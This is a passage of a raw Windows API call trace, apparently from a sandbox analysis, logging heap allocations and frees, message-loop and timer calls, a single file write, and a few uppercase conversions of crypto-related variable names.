0x2e509b0 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0212.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f2a298 [0212.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f2d3d8 [0212.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a298 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0212.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f2a298 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2d3d8 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0212.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f2d3d8 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a298 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0212.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0212.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0213.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0213.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0213.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0213.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0213.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f289f8 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0213.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27158 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0213.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2bb38 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0213.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f258b8 | out: hHeap=0x970000) returned 1 [0213.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0213.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0213.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f24018 [0213.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2d3d8 | out: hHeap=0x970000) returned 1 [0213.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0213.689] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0213.690] TranslateMessage (lpMsg=0x8cf708) returned 0 [0213.690] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0213.690] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0213.690] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0213.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0213.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0213.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0213.690] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0213.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0213.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0213.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f258b8 [0213.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0213.691] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f258b8*, nNumberOfBytesToWrite=0x1898, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f258b8*, lpNumberOfBytesWritten=0x8cf5e4*=0x1898, lpOverlapped=0x0) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f258b8 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0213.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0213.693] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0213.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0213.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0213.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0213.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0213.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0213.694] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0213.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0213.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0213.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0213.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0213.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0213.695] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0213.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0213.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0213.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0213.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0213.695] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0213.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0213.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0213.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0213.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0213.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0213.696] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0213.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, 